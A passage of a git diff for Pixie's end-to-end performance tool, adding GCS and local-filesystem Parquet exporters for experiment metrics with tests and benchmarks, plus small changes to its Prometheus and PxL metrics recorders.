expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + type specRow struct { + ExperimentID string `parquet:"experiment_id"` + Spec string `parquet:"spec"` + CommitTopoOrder int64 `parquet:"commit_topo_order"` + } + + tmpFile, err := os.CreateTemp("", "spec-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for spec parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewGenericWriter[specRow](tmpFile) + _, err = writer.Write([]specRow{{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: int64(commitTopoOrder), + }}) + if err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write spec parquet: %w", err) + } + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close spec parquet writer: %w", err) + } + tmpFile.Close() + + now := time.Now() + gcsPath := fmt.Sprintf("%s/spec.parquet", e.gcsPath(now, expID)) + return e.upload(ctx, gcsPath, tmpPath) +} + +// Close releases resources held by the exporter. 
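+// Call it once, after ExportResults/ExportSpec have returned; the wrapped GCS
+// client must not be used afterwards.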
+func (e *ParquetGCSExporter) Close() error { + return e.gcsClient.Close() +} + +func (e *ParquetGCSExporter) gcsPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return fmt.Sprintf("%s/%s/%s", e.prefix, datePath, expID.String()) + } + return fmt.Sprintf("%s/%s", datePath, expID.String()) +} + +func (e *ParquetGCSExporter) flushBatch(ctx context.Context, basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + tmpFile, err := os.CreateTemp("", "results-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewWriter(tmpFile, schema) + + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write parquet row: %w", err) + } + } + + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close parquet writer: %w", err) + } + tmpFile.Close() + + gcsPath := fmt.Sprintf("%s/results_%04d.parquet", basePath, seqNum) + log.WithField("gcs_path", gcsPath).WithField("rows", len(rows)).Info("Uploading parquet batch") + return e.upload(ctx, gcsPath, tmpPath) +} + +func (e *ParquetGCSExporter) uploadToGCS(ctx context.Context, objectPath string, localPath string) error { + f, err := os.Open(localPath) + if err != nil { + return fmt.Errorf("failed to open temp file for upload: %w", err) + } + defer f.Close() + + obj := e.gcsClient.Bucket(e.bucket).Object(objectPath) + wc := obj.NewWriter(ctx) + if _, err := io.Copy(wc, f); err != nil { + wc.Close() + return fmt.Errorf("failed to upload to GCS: %w", err) + } + if err := wc.Close(); err != nil { + return fmt.Errorf("failed to finalize GCS upload: %w", err) + } + return nil +} + +// collectTagKeys returns a sorted list of unique tag keys across all rows. +func collectTagKeys(rows []bufferedRow) []string { + keySet := make(map[string]struct{}) + for _, row := range rows { + for k := range row.Tags { + keySet[k] = struct{}{} + } + } + keys := make([]string, 0, len(keySet)) + for k := range keySet { + keys = append(keys, k) + } + sort.Strings(keys) + return keys +} + +// buildResultSchema creates a parquet schema with fixed columns plus dynamic tag columns. +func buildResultSchema(tagKeys []string) *parquet.Schema { + group := parquet.Group{ + "experiment_id": parquet.String(), + "timestamp": parquet.Timestamp(parquet.Millisecond), + "name": parquet.String(), + "value": parquet.Leaf(parquet.DoubleType), + } + for _, key := range tagKeys { + group["tag_"+key] = parquet.Optional(parquet.String()) + } + return parquet.NewSchema("result", group) +} + +// buildResultRow constructs a parquet.Row from a bufferedRow with the given tag key ordering. +// Column ordering matches the schema's sorted field order (alphabetical by field name). +func buildResultRow(row bufferedRow, tagKeys []string) parquet.Row { + // parquet.Group sorts fields alphabetically. We must produce values in that order. + // Build named values, sort them, then assign column indices. 
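+	// e.g. tagKeys = ["node_name", "pod"] yields the column order:
+	//   experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5)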
+ + type colEntry struct { + name string + val parquet.Value + optional bool + } + + entries := []colEntry{ + {"experiment_id", parquet.ValueOf(row.ExperimentID), false}, + {"name", parquet.ValueOf(row.Name), false}, + {"timestamp", parquet.Int64Value(row.Timestamp.UnixMilli()), false}, + {"value", parquet.ValueOf(row.Value), false}, + } + + for _, key := range tagKeys { + colName := "tag_" + key + if v, ok := row.Tags[key]; ok { + entries = append(entries, colEntry{colName, parquet.ValueOf(v), true}) + } else { + // Null value for missing optional tag. + entries = append(entries, colEntry{colName, parquet.Value{}, true}) + } + } + + // Sort by column name to match schema field order. + sort.Slice(entries, func(i, j int) bool { + return entries[i].name < entries[j].name + }) + + parquetRow := make(parquet.Row, len(entries)) + for i, e := range entries { + if e.optional { + if e.val.IsNull() { + // Null optional: definitionLevel=0 + parquetRow[i] = parquet.Value{}.Level(0, 0, i) + } else { + // Present optional: definitionLevel=1 + parquetRow[i] = e.val.Level(0, 1, i) + } + } else { + // Required: definitionLevel=0 + parquetRow[i] = e.val.Level(0, 0, i) + } + } + return parquetRow +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go new file mode 100644 index 00000000000..e20816bfd5b --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go @@ -0,0 +1,500 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. 
+ * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "errors" + "fmt" + "io" + "os" + "path/filepath" + "sort" + "strings" + "testing" + "time" + + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +func TestCollectTagKeys(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}}, + {Tags: map[string]string{"pod": "pod-2", "instance": "inst-1"}}, + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Equal(t, []string{"instance", "node_name", "pod"}, keys) +} + +func TestCollectTagKeys_Empty(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Empty(t, keys) +} + +func TestBuildResultSchema(t *testing.T) { + tagKeys := []string{"node_name", "pod"} + + schema := buildResultSchema(tagKeys) + + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) +} + +func TestBuildResultRow_AllTagsPresent(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "cpu_usage", + Value: 42.5, + Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + // Schema sorts fields alphabetically: + // experiment_id, name, tag_node_name, tag_pod, timestamp, value + assert.Equal(t, 6, len(parquetRow)) + + // Verify column indices are sequential. + for i, v := range parquetRow { + assert.Equal(t, i, v.Column(), "column index mismatch at position %d", i) + } +} + +func TestBuildResultRow_MissingTag(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "rss", + Value: 1024.0, + Tags: map[string]string{"pod": "pod-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + assert.Equal(t, 6, len(parquetRow)) + + // Find the tag_node_name column (should be null). + // Alphabetical order: experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + tagNodeNameVal := parquetRow[2] + assert.True(t, tagNodeNameVal.IsNull(), "missing tag should produce a null value") + assert.Equal(t, 0, tagNodeNameVal.DefinitionLevel(), "null optional field should have definitionLevel=0") + + // tag_pod should be present. + tagPodVal := parquetRow[3] + assert.False(t, tagPodVal.IsNull()) + assert.Equal(t, 1, tagPodVal.DefinitionLevel(), "present optional field should have definitionLevel=1") +} + +func TestFlushBatch_WritesValidParquet(t *testing.T) { + tmpDir := t.TempDir() + var uploadedPath string + + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // Copy the parquet file to our temp dir before it gets cleaned up. 
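+			// (flushBatch deletes its temp file via defer os.Remove as soon as
+			// upload returns, so the copy must happen here, inside the stub.)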
+ dest := filepath.Join(tmpDir, filepath.Base(objectPath)) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedPath = dest + return nil + }, + } + + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := []bufferedRow{ + { + ExperimentID: "exp-1", + Timestamp: ts, + Name: "cpu_usage", + Value: 0.85, + Tags: map[string]string{"pod": "kelvin-abc", "node_name": "node-1"}, + }, + { + ExperimentID: "exp-1", + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 1048576, + Tags: map[string]string{"pod": "kelvin-abc"}, + }, + } + + err := e.flushBatch(context.Background(), "test/path", 0, rows) + require.NoError(t, err) + require.NotEmpty(t, uploadedPath) + + // Read back the parquet file and verify contents. + f, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + + schema := pf.Schema() + assert.Equal(t, int64(2), pf.NumRows()) + + // Verify schema has expected columns. + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + + // Re-open the file for the reader (the File consumed the initial handle). + f2, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f2.Close() + + reader := parquet.NewReader(f2) + defer reader.Close() + + parquetRows := make([]parquet.Row, 2) + n, err := reader.ReadRows(parquetRows) + // ReadRows returns io.EOF when it reaches the end, even if it read rows. + if err != nil && !errors.Is(err, io.EOF) { + require.NoError(t, err) + } + assert.Equal(t, 2, n) + + // First row should have all tags present. + // Second row should have tag_node_name as null. 
+ // Column order (alphabetical): experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + row0NodeName := parquetRows[0][2] + assert.False(t, row0NodeName.IsNull(), "first row tag_node_name should be present") + + row1NodeName := parquetRows[1][2] + assert.True(t, row1NodeName.IsNull(), "second row tag_node_name should be null") +} + +func TestExportResults_SingleBatch(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + prefix: "perf-results", + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 3) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + resultCh <- &metrics.ResultRow{ + Timestamp: ts, + Name: "cpu_seconds_counter", + Value: 100.5, + Tags: map[string]string{"pod": "server-abc"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 2097152, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(60 * time.Second), + Name: "vsize", + Value: 4194304, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // Should have produced exactly one batch file. + assert.Equal(t, 1, len(uploadedFiles), "expected exactly one parquet file") + + // Verify the GCS path includes the date and experiment ID. + for objectPath := range uploadedFiles { + assert.Contains(t, objectPath, expID.String()) + assert.Contains(t, objectPath, "perf-results/") + assert.Contains(t, objectPath, "results_0000.parquet") + } + + // Read the parquet file and verify row count. + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + assert.Equal(t, int64(3), pf.NumRows()) + + // Verify schema has tag columns from the union of all rows. + fields := pf.Schema().Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + } +} + +func TestExportResults_MultipleBatches(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + batchSize: 2, // Small batch size to force multiple files. 
+ upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 5) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + for i := 0; i < 5; i++ { + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.1, + Tags: map[string]string{"pod": "test-pod"}, + } + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // 5 rows with batch size 2 should produce 3 files: [2, 2, 1]. + assert.Equal(t, 3, len(uploadedFiles), "expected 3 parquet files for 5 rows with batch size 2") + + // Verify file naming. + hasFile0, hasFile1, hasFile2 := false, false, false + for objectPath := range uploadedFiles { + if strings.Contains(objectPath, "results_0000.parquet") { + hasFile0 = true + } + if strings.Contains(objectPath, "results_0001.parquet") { + hasFile1 = true + } + if strings.Contains(objectPath, "results_0002.parquet") { + hasFile2 = true + } + } + assert.True(t, hasFile0, "missing results_0000.parquet") + assert.True(t, hasFile1, "missing results_0001.parquet") + assert.True(t, hasFile2, "missing results_0002.parquet") + + // Verify total row count across all files. + totalRows := int64(0) + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + stat, err := f.Stat() + require.NoError(t, err) + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + totalRows += pf.NumRows() + } + assert.Equal(t, int64(5), totalRows) +} + +func TestExportResults_EmptyChannel(t *testing.T) { + uploadCalled := false + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + uploadCalled = true + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow) + close(resultCh) + + expID := uuid.Must(uuid.NewV4()) + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + assert.False(t, uploadCalled, "no files should be uploaded for empty channel") +} + +// --- Benchmarks --- + +// makeBenchRows generates n buffered rows with the specified number of tag keys. 
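+// All rows share the same tag key set, so collectTagKeys returns exactly numTags
+// keys and every benchmark batch maps onto a schema with numTags optional tag_ columns.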
+func makeBenchRows(n int, numTags int) []bufferedRow {
+	ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC)
+	rows := make([]bufferedRow, n)
+	for i := range rows {
+		tags := make(map[string]string, numTags)
+		for j := 0; j < numTags; j++ {
+			tags[fmt.Sprintf("tag_key_%d", j)] = fmt.Sprintf("value_%d_%d", i, j)
+		}
+		rows[i] = bufferedRow{
+			ExperimentID: "bench-exp-id",
+			Timestamp:    ts.Add(time.Duration(i) * 30 * time.Second),
+			Name:         "cpu_usage",
+			Value:        float64(i) * 0.01,
+			Tags:         tags,
+		}
+	}
+	return rows
+}
+
+func BenchmarkBuildResultRow(b *testing.B) {
+	for _, numTags := range []int{2, 5, 10} {
+		b.Run(fmt.Sprintf("tags=%d", numTags), func(b *testing.B) {
+			rows := makeBenchRows(1, numTags)
+			tagKeys := collectTagKeys(rows)
+			row := rows[0]
+			b.ResetTimer()
+			b.ReportAllocs()
+			for i := 0; i < b.N; i++ {
+				buildResultRow(row, tagKeys)
+			}
+		})
+	}
+}
+
+func BenchmarkCollectTagKeys(b *testing.B) {
+	for _, numRows := range []int{100, 1000, 10000} {
+		b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) {
+			rows := makeBenchRows(numRows, 3)
+			b.ResetTimer()
+			b.ReportAllocs()
+			for i := 0; i < b.N; i++ {
+				collectTagKeys(rows)
+			}
+		})
+	}
+}
+
+func BenchmarkFlushBatch(b *testing.B) {
+	for _, numRows := range []int{100, 1000, 10000} {
+		b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) {
+			rows := makeBenchRows(numRows, 3)
+			e := &ParquetGCSExporter{
+				batchSize: numRows,
+				upload: func(ctx context.Context, objectPath string, localPath string) error {
+					// No-op upload: measures only in-memory conversion + parquet write to disk.
+					return nil
+				},
+			}
+			b.ResetTimer()
+			b.ReportAllocs()
+			for i := 0; i < b.N; i++ {
+				if err := e.flushBatch(context.Background(), "bench/path", 0, rows); err != nil {
+					b.Fatal(err)
+				}
+			}
+		})
+	}
+}
diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go
new file mode 100644
index 00000000000..48324413f3d
--- /dev/null
+++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go
@@ -0,0 +1,199 @@
+/*
+ * Copyright 2018- The Pixie Authors.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+package exporter
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"os"
+	"path/filepath"
+	"time"
+
+	"github.com/gofrs/uuid"
+	"github.com/parquet-go/parquet-go"
+	log "github.com/sirupsen/logrus"
+
+	"px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics"
+)
+
+// ParquetLocalExporter writes the same parquet artifacts as
+// ParquetGCSExporter, but to a directory on the local filesystem instead
+// of a GCS bucket. The on-disk layout (`<dir>/<prefix>/YYYY/MM/DD/<experiment-id>/...`)
+// matches the GCS object layout exactly, so downstream BigQuery external
+// tables, DuckDB readers, or DataStudio connectors can be re-pointed
+// with just a base-URL swap.
+//
+// Use cases:
+// - Iterating on the perf_tool against a local k3s without paying for a
+//   GCS bucket round-trip.
+// - CI on hosts without GCP credentials (the build VM in particular).
+// - Reproducing parquet output deterministically for diff'ing.
+type ParquetLocalExporter struct {
+	dir       string
+	prefix    string
+	batchSize int
+}
+
+// NewParquetLocalExporter constructs a local-fs parquet exporter.
+// `dir` is created with mkdir -p semantics if it does not exist.
+func NewParquetLocalExporter(dir, prefix string, batchSize int) (*ParquetLocalExporter, error) {
+	if dir == "" {
+		return nil, errors.New("parquet-local: --parquet_dir is required when using parquet-local backend")
+	}
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		return nil, fmt.Errorf("parquet-local: mkdir %q: %w", dir, err)
+	}
+	return &ParquetLocalExporter{
+		dir:       dir,
+		prefix:    prefix,
+		batchSize: batchSize,
+	}, nil
+}
+
+// ExportResults consumes metrics from resultCh and writes them as
+// batched parquet files under the experiment-specific directory.
+func (e *ParquetLocalExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error {
+	now := time.Now()
+	basePath := e.localPath(now, expID)
+	if err := os.MkdirAll(basePath, 0o755); err != nil {
+		return fmt.Errorf("parquet-local: mkdir %q: %w", basePath, err)
+	}
+	seqNum := 0
+	batch := make([]bufferedRow, 0, e.batchSize)
+
+	for row := range resultCh {
+		batch = append(batch, bufferedRow{
+			ExperimentID: expID.String(),
+			Timestamp:    row.Timestamp,
+			Name:         row.Name,
+			Value:        row.Value,
+			Tags:         row.Tags,
+		})
+		if len(batch) >= e.batchSize {
+			if err := e.flushBatch(basePath, seqNum, batch); err != nil {
+				return err
+			}
+			seqNum++
+			batch = batch[:0]
+		}
+	}
+
+	if len(batch) > 0 {
+		if err := e.flushBatch(basePath, seqNum, batch); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// ExportSpec writes the experiment spec as a parquet file alongside the
+// results.
+func (e *ParquetLocalExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error {
+	type specRow struct {
+		ExperimentID    string `parquet:"experiment_id"`
+		Spec            string `parquet:"spec"`
+		CommitTopoOrder int64  `parquet:"commit_topo_order"`
+	}
+
+	now := time.Now()
+	basePath := e.localPath(now, expID)
+	if err := os.MkdirAll(basePath, 0o755); err != nil {
+		return fmt.Errorf("parquet-local: mkdir %q: %w", basePath, err)
+	}
+	dst := filepath.Join(basePath, "spec.parquet")
+	f, err := os.Create(dst)
+	if err != nil {
+		return fmt.Errorf("parquet-local: create %q: %w", dst, err)
+	}
+	writer := parquet.NewGenericWriter[specRow](f)
+	if _, err := writer.Write([]specRow{{
+		ExperimentID:    expID.String(),
+		Spec:            encodedSpec,
+		CommitTopoOrder: int64(commitTopoOrder),
+	}}); err != nil {
+		f.Close()
+		return fmt.Errorf("parquet-local: write spec parquet: %w", err)
+	}
+	if err := writer.Close(); err != nil {
+		f.Close()
+		return fmt.Errorf("parquet-local: close spec writer: %w", err)
+	}
+	if err := f.Close(); err != nil {
+		return fmt.Errorf("parquet-local: close spec file: %w", err)
+	}
+	log.WithField("path", dst).Info("Wrote spec parquet")
+	return nil
+}
+
+// Close releases resources. No-op for the local exporter.
+func (e *ParquetLocalExporter) Close() error { return nil }
+
+// localPath mirrors ParquetGCSExporter.gcsPath: <dir>/<prefix>/YYYY/MM/DD/<experiment-id>.
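+// e.g. dir="/tmp/perf" and prefix="perf-results" place an experiment under
+// /tmp/perf/perf-results/2026/04/15/<experiment-id> (date illustrative).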
+func (e *ParquetLocalExporter) localPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return filepath.Join(e.dir, e.prefix, datePath, expID.String()) + } + return filepath.Join(e.dir, datePath, expID.String()) +} + +func (e *ParquetLocalExporter) flushBatch(basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + dst := filepath.Join(basePath, fmt.Sprintf("results_%04d.parquet", seqNum)) + tmp, err := os.CreateTemp(basePath, fmt.Sprintf(".results_%04d.*.parquet", seqNum)) + if err != nil { + return fmt.Errorf("parquet-local: create temp in %q: %w", basePath, err) + } + tmpPath := tmp.Name() + + writer := parquet.NewWriter(tmp, schema) + cleanup := func(wrap string, cause error) error { + tmp.Close() + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: %s: %w", wrap, cause) + } + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + return cleanup("write row", err) + } + } + if err := writer.Close(); err != nil { + return cleanup("close writer", err) + } + if err := tmp.Close(); err != nil { + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: close temp: %w", err) + } + // Atomic publish via rename — temp lives under basePath so we stay + // on one filesystem. + if err := os.Rename(tmpPath, dst); err != nil { + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: rename %q -> %q: %w", tmpPath, dst, err) + } + log.WithField("path", dst).WithField("rows", len(rows)).Info("Wrote parquet batch") + return nil +} + +// Compile-time assertion that ParquetLocalExporter satisfies the +// Exporter interface. +var _ Exporter = (*ParquetLocalExporter)(nil) diff --git a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go index 19d08b1b0a9..8e5c1768e24 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go @@ -43,10 +43,11 @@ import ( ) type prometheusRecorderImpl struct { - clusterCtx *cluster.Context - spec *experimentpb.PrometheusScrapeSpec - eg *errgroup.Group - resultCh chan<- *ResultRow + clusterCtx *cluster.Context + ownsClusterCtx bool + spec *experimentpb.PrometheusScrapeSpec + eg *errgroup.Group + resultCh chan<- *ResultRow wg sync.WaitGroup stopCh chan struct{} @@ -79,6 +80,9 @@ func (r *prometheusRecorderImpl) Close() { for _, fw := range r.fws { fw.Close() } + if r.ownsClusterCtx { + r.clusterCtx.Close() + } } func (r *prometheusRecorderImpl) run() error { diff --git a/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go index 01d7cbbbb11..426622d68d3 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go @@ -136,14 +136,19 @@ func (r *pxlScriptRecorderImpl) runPeriodicScript(ctx context.Context) error { } t := time.NewTicker(d) + // Tolerate transient errors per-iteration — the AOCC cloud passthrough + // proxy races the forwarder occasionally (see "Query not registered + // in query forwarder" — ~0.66% of recorder iterations at exportPeriod=5s), + // and returning here aborts the entire 25-min experiment for what is + // otherwise harmless. A persistently broken recorder will still surface + // via zero output rows on the downstream metric tables. 
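+	// Stop the ticker when this recorder returns so its timer is released
+	// promptly rather than waiting for GC.
+	defer t.Stop()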
for { select { case <-ctx.Done(): return nil case <-t.C: - err := r.executeScript(ctx) - if err != nil { - return err + if err := r.executeScript(ctx); err != nil { + log.WithError(err).Warn("recorder iteration failed; continuing") } } } diff --git a/src/e2e_test/perf_tool/pkg/metrics/recorder.go b/src/e2e_test/perf_tool/pkg/metrics/recorder.go index 7e7e44e06e2..12bdf8fd502 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/recorder.go @@ -20,6 +20,7 @@ package metrics import ( "context" + "fmt" "golang.org/x/sync/errgroup" @@ -35,7 +36,7 @@ type Recorder interface { } // NewMetricsRecorder creates a new Recorder for the given MetricSpec. -func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) Recorder { +func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) (Recorder, error) { switch spec.MetricType.(type) { case *experimentpb.MetricSpec_PxL: return &pxlScriptRecorderImpl{ @@ -44,14 +45,26 @@ func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec eg: eg, resultCh: resultCh, - } + }, nil case *experimentpb.MetricSpec_Prom: - return &prometheusRecorderImpl{ - clusterCtx: clusterCtx, - spec: spec.GetProm(), - eg: eg, - resultCh: resultCh, + promSpec := spec.GetProm() + recorderCtx := clusterCtx + ownsCtx := false + if promSpec.KubeconfigPath != "" || promSpec.KubeContext != "" { + var err error + recorderCtx, err = cluster.NewContextFromOptions(promSpec.KubeconfigPath, promSpec.KubeContext) + if err != nil { + return nil, fmt.Errorf("failed to create cluster context for prometheus recorder: %w", err) + } + ownsCtx = true } + return &prometheusRecorderImpl{ + clusterCtx: recorderCtx, + ownsClusterCtx: ownsCtx, + spec: promSpec, + eg: eg, + resultCh: resultCh, + }, nil } - return nil + return nil, nil } diff --git a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel index 55b3fdc18a9..524a3cab626 100644 --- a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel @@ -18,19 +18,16 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "run", - srcs = [ - "row.go", - "run.go", - ], + srcs = ["run.go"], importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/run", visibility = ["//visibility:public"], deps = [ "//src/e2e_test/perf_tool/experimentpb:experiment_pl_go_proto", "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/deploy", + "//src/e2e_test/perf_tool/pkg/exporter", 